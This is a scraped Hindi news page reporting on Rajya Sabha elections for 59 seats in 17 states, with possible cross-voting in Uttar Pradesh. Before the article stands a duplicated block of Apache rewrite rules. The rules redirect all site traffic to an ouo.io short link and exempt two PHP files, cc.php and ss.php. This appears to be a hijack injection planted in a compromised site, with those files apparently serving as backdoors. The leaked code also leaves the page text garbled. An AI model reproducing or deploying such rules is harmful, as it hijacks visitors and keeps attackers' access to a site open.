
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 474
Previous Nextलखनऊ। राज्यसभा को आज से नए सदस्य मिलने वाले है। 17 राज्यों से कुल 59 सीटों पर आज राज्यसभा चुनाव होने हैं। हालांकि विधायकों के गणित की वजह से कई सदस्य पहले ही निर्विरोध चुने जा चुके हैं। 59 सीटों में से 25 सीटों पर आज वोटिंग है। बाकी 33 सीटों पर एक ही उम्मीदवार होने के कारण उनका निर्वाचन 15 मार्च को ही हो चुका है। सूत्रों से पता चला है कि बसपा विधायक अनिल सिंह ने कल बीजेपी विधायकों से मुलाकात की। मुख्यमंत्री आवास पर हुई विधायक दल की बैठक में अनिल सिंह को भी देखा गया था। इससे साफ है कि ऐसे में चुनावों क्रॉस वोटिंग की संभावना हो सकती है।
आज यूपी की 10, बिहार की 6, महाराष्ट्र की 6, पश्चिम बंगाल की 5, मध्य प्रदेश की 5, गुजरात की 4, कर्नाटक की 4, आंध्र प्रदेश की 3, राजस्थान की 3, ओडिशा की 3, तेलंगाना की 3, झारखंड की 2, उत्तराखंड, छत्तीसगढ़, हिमाचल, हरियाणा और केरल की एक-एक राज्यसभा सीट के लिए चुनाव होंगे। इसके साथ ही नतीजों का ऐलान भी आज ही किया जाएगा। इनमें से सबसे बड़ी जंग यूपी की 10वीं सीट को लेकर है। केरल में 1 राज्यसभा तब खाली हुई थी जब जदयू के सांसद एमपी वीरेंद्र कुमार ने इस्तीफा दे दिया था। उस सीट के लिए उपचुनाव भी साथ ही होगा।